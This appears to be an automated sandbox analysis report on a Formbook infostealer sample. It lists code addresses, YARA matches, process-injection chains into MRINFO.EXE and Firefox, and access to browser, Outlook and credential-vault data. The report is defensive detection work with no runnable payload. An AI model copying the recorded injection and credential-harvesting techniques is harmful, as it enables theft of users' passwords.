Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346A352	3_2_0346A352
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034703E6	3_2_034703E6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033BE3F0	3_2_033BE3F0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03450274	3_2_03450274
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034302C0	3_2_034302C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03438158	3_2_03438158
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033A0100	3_2_033A0100
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0344A118	3_2_0344A118
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034681CC	3_2_034681CC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034641A2	3_2_034641A2
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034701AA	3_2_034701AA
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03442000	3_2_03442000
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B0770	3_2_033B0770
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033D4750	3_2_033D4750
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033AC7C0	3_2_033AC7C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CC6E0	3_2_033CC6E0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B0535	3_2_033B0535
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03470591	3_2_03470591
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03462446	3_2_03462446
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03454420	3_2_03454420
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0345E4F6	3_2_0345E4F6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346AB40	3_2_0346AB40
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03466BD7	3_2_03466BD7
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033AEA80	3_2_033AEA80
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033C6962	3_2_033C6962
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B29A0	3_2_033B29A0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0347A9A6	3_2_0347A9A6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B2840	3_2_033B2840
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033BA840	3_2_033BA840
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033968B8	3_2_033968B8
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033DE8F0	3_2_033DE8F0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03424F40	3_2_03424F40
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033D0F30	3_2_033D0F30
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033F2F28	3_2_033F2F28
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03452F30	3_2_03452F30
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0342EFA0	3_2_0342EFA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033A2FC8	3_2_033A2FC8
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346EE26	3_2_0346EE26
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B0E59	3_2_033B0E59
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346EEDB	3_2_0346EEDB
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033C2E90	3_2_033C2E90
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346CE93	3_2_0346CE93
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033BAD00	3_2_033BAD00
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0344CD1F	3_2_0344CD1F
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033C8DBF	3_2_033C8DBF
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033AADE0	3_2_033AADE0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B0C00	3_2_033B0C00
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033A0CF2	3_2_033A0CF2
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03450CB5	3_2_03450CB5
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346132D	3_2_0346132D
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0339D34C	3_2_0339D34C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033F739A	3_2_033F739A
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B52A0	3_2_033B52A0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034512ED	3_2_034512ED
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CD2F0	3_2_033CD2F0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CB2C0	3_2_033CB2C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0347B16B	3_2_0347B16B
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0339F172	3_2_0339F172
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E516C	3_2_033E516C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033BB1B0	3_2_033BB1B0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0345F0CC	3_2_0345F0CC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346F0E0	3_2_0346F0E0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034670E9	3_2_034670E9
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B70C0	3_2_033B70C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346F7B0	3_2_0346F7B0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033F5630	3_2_033F5630
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034616CC	3_2_034616CC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03467571	3_2_03467571
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_034795C3	3_2_034795C3
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0344D5B0	3_2_0344D5B0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033A1460	3_2_033A1460
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346F43F	3_2_0346F43F
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346FB76	3_2_0346FB76
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03425BF0	3_2_03425BF0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CFB80	3_2_033CFB80
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033EDBF9	3_2_033EDBF9
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03467A46	3_2_03467A46
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346FA49	3_2_0346FA49
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03423A6C	3_2_03423A6C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0345DAC6	3_2_0345DAC6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033F5AA0	3_2_033F5AA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03451AA3	3_2_03451AA3
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0344DAAC	3_2_0344DAAC
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03445910	3_2_03445910
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B9950	3_2_033B9950
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CB950	3_2_033CB950
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0341D800	3_2_0341D800
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B38E0	3_2_033B38E0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346FF09	3_2_0346FF09
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B1F92	3_2_033B1F92
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03373FD5	3_2_03373FD5
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03373FD2	3_2_03373FD2
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346FFB1	3_2_0346FFB1
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B9EB0	3_2_033B9EB0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03461D5A	3_2_03461D5A
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03467D73	3_2_03467D73
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033B3D40	3_2_033B3D40
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033CFDC0	3_2_033CFDC0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03429C32	3_2_03429C32
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0346FCF2	3_2_0346FCF2
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02991B10	3_2_02991B10
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0298C9F0	3_2_0298C9F0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0298C9ED	3_2_0298C9ED
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0298AC90	3_2_0298AC90
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0298CC10	3_2_0298CC10
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02993390	3_2_02993390
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0299338C	3_2_0299338C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029951A0	3_2_029951A0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029AB8E0	3_2_029AB8E0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CE388	3_2_031CE388
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CE4A4	3_2_031CE4A4
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CCB33	3_2_031CCB33
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CE83C	3_2_031CE83C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CD8A8	3_2_031CD8A8

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: String function: 00E9B970 appears 262 times
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: String function: 00EE5130 appears 58 times
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: String function: 00EF7E54 appears 99 times
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: String function: 00F1EA12 appears 86 times
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: String function: 00F2F290 appears 103 times
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: String function: 0339B970 appears 262 times
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: String function: 033E5130 appears 58 times
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: String function: 0342F290 appears 103 times
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: String function: 033F7E54 appears 107 times
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: String function: 0341EA12 appears 86 times

Source: alWUxZvrvU.exe

Static PE information: No import functions for PE file found

Source: alWUxZvrvU.exe, 00000000.00000002.1907253978.0000000000F9D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs alWUxZvrvU.exe
Source: alWUxZvrvU.exe, 00000000.00000003.1869240219.0000000000884000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemrinfo.exej% vs alWUxZvrvU.exe
Source: alWUxZvrvU.exe, 00000000.00000003.1869240219.000000000087D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemrinfo.exej% vs alWUxZvrvU.exe
Source: alWUxZvrvU.exe, 00000000.00000003.1804998823.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs alWUxZvrvU.exe
Source: alWUxZvrvU.exe, 00000000.00000003.1806737624.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs alWUxZvrvU.exe

Source: alWUxZvrvU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.alWUxZvrvU.exe.c70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: alWUxZvrvU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: alWUxZvrvU.exe

Static PE information: Section .text

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@11/10

Source: C:\Windows\SysWOW64\MRINFO.EXE

File created: C:\Users\user\AppData\Local\Temp\220i73Hn

Jump to behavior

Source: alWUxZvrvU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\alWUxZvrvU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MRINFO.EXE, 00000003.00000002.4157064198.0000000002F9B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: alWUxZvrvU.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\alWUxZvrvU.exe "C:\Users\user\Desktop\alWUxZvrvU.exe"
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Process created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Process created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\MRINFO.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\MRINFO.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: alWUxZvrvU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZVRmRlsEcS.exe, 00000001.00000000.1823678989.0000000000CBE000.00000002.00000001.01000000.00000004.sdmp, ZVRmRlsEcS.exe, 00000006.00000000.1977113532.0000000000CBE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: alWUxZvrvU.exe, 00000000.00000003.1804998823.0000000000963000.00000004.00000020.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000002.1907253978.000000000100E000.00000040.00001000.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000003.1806737624.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000003.1910842546.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000003.1912344051.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000002.4157728653.000000000350E000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000002.4157728653.0000000003370000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: alWUxZvrvU.exe, alWUxZvrvU.exe, 00000000.00000003.1804998823.0000000000963000.00000004.00000020.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000002.1907253978.000000000100E000.00000040.00001000.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000003.1806737624.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, alWUxZvrvU.exe, 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, MRINFO.EXE, 00000003.00000003.1910842546.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000003.1912344051.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000002.4157728653.000000000350E000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 00000003.00000002.4157728653.0000000003370000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mrinfo.pdbGCTL source: alWUxZvrvU.exe, 00000000.00000003.1869240219.000000000087D000.00000004.00000020.00020000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4156908164.00000000006C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mrinfo.pdb source: alWUxZvrvU.exe, 00000000.00000003.1869240219.000000000087D000.00000004.00000020.00020000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4156908164.00000000006C8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C73380 push eax; ret	0_2_00C73382
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C844D9 push ss; retf	0_2_00C84502
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C8848B push ecx; ret	0_2_00C8848C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7B40E push ss; iretd	0_2_00C7B40F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C78637 push esp; ret	0_2_00C7863D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7BFF8 push ss; retf	0_2_00C7BFFE
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C83FA4 push edi; ret	0_2_00C83FB1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7CF1C push edi; retf	0_2_00C7CF30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA09AD push ecx; mov dword ptr [esp], ecx	0_2_00EA09B6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0337225F pushad ; ret	3_2_033727F9
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033727FA pushad ; ret	3_2_033727F9
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033A09AD push ecx; mov dword ptr [esp], ecx	3_2_033A09B6
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0337283D push eax; iretd	3_2_03372858
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_03371344 push eax; iretd	3_2_03371369
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_0298808B push ss; iretd	3_2_0298808C
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02992479 push cs; iretd	3_2_0299247A
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_02988C75 push ss; retf	3_2_02988C7B
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029852B4 push esp; ret	3_2_029852BA
